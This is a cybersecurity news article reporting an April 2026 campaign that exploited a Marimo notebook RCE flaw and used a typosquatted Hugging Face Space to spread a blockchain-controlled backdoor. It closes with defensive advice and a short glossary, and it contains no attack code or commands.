الأحد 05 يوليو 2026 01:53:07 GMT+02:00

Netcrook

الرئيسيةالبيان
الأخبار
Techcrook
Geocrook
WikicrookالفريقAppاتصال
ArabicEnglishItaliano

Technology, Innovation & Digital Infrastructure

AI’s Trusted Gatekeeper Compromised: Hugging Face Used as Stealth Launchpad for Blockchain-Powered Malware

Published: 18 April 2026 05:02Category: Technology, Innovation & Digital InfrastructureAuthor: TRUSTBREAKER

Subtitle: A critical Marimo notebook flaw enables attackers to hijack AI developer environments and deploy undetectable backdoors via Hugging Face Spaces.

When AI’s most trusted tools become the very weapon used against their creators, the stakes for the digital frontier escalate overnight. In mid-April 2026, cybercriminals moved with breathtaking speed to exploit a newly disclosed vulnerability in Marimo, a popular Python notebook platform for AI/ML development. Within hours, trusted Hugging Face Spaces-long considered a safe haven for developers-were repurposed as malware launchpads, unleashing a sophisticated blockchain-powered backdoor into some of the world’s most sensitive cloud environments.

The attack chain began with CVE-2026-39987, a remote code execution (RCE) vulnerability in Marimo that allowed unauthenticated attackers to run arbitrary commands on exposed instances-no login required. The flaw’s public disclosure on GitHub triggered a global race: within 10 hours, threat actors pivoted to exploitation, with Sysdig’s Threat Research Team logging hundreds of attacks from over a dozen countries in just three days.

Once inside, adversaries wasted no time. Their playbook was methodical: scrape environment variables to harvest AWS keys, OpenAI tokens, and database URLs; attempt reverse shells across multiple protocols; and, failing that, leverage stolen credentials to burrow further into backend systems like PostgreSQL and Redis. Even when outbound connections were blocked, attackers used clever DNS callbacks to confirm their foothold.

The campaign’s centerpiece was a cunning twist: a Hugging Face Space named “vsccode-modetx”-a typo of “VS Code”-hosted a malicious shell script disguised as a legitimate tool installer. This script silently dropped “kagent,” a Go-based binary masquerading as a Kubernetes AI agent. The malware established persistence through systemd, crontab, or macOS LaunchAgents, blending seamlessly into developer workstations.

What set this attack apart was kagent’s use of the NKN blockchain for command-and-control (C2). Unlike traditional malware that phones home to a known server, this backdoor communicated across a decentralized blockchain network, making it nearly impossible for defenders to block or trace. By riding on the clean reputation of Hugging Face’s infrastructure, attackers sidestepped many standard security controls, echoing tactics seen in previous Android RAT campaigns but now adapted for the AI/ML ecosystem.

The implications are sobering: AI developer environments often contain the keys to the cloud kingdom-credentials, tokens, and access to sensitive data pipelines. A persistent backdoor here doesn’t just threaten a single workstation; it risks cascading compromise across entire cloud-native infrastructures.

As the dust settles, defenders are urged to patch Marimo instances immediately, restrict access, and scrutinize any downloads or scripts referencing suspicious Hugging Face Spaces. The lesson is clear: in the age of AI, even the most trusted platforms can become unwitting accomplices. Blind trust is no longer an option-vigilance and layered defenses are now mandatory for every organization building on the bleeding edge.

WIKICROOK

  • Remote Code Execution (RCE): Remote Code Execution (RCE) is when an attacker runs their own code on a victim’s system, often leading to full control or compromise of that system.
  • Persistence: Persistence involves techniques used by malware to survive reboots and stay hidden on systems, often by mimicking legitimate processes or updates.
  • Command: A command is an instruction sent to a device or software, often by a C2 server, directing it to perform specific actions, sometimes for malicious purposes.
  • Typosquatting: Typosquatting is when attackers use lookalike names of trusted sites or software to trick users into visiting fake sites or downloading malware.
  • Environment Variables: Environment variables are hidden computer settings that store important and sensitive information, such as passwords or API keys, used by programs and servers.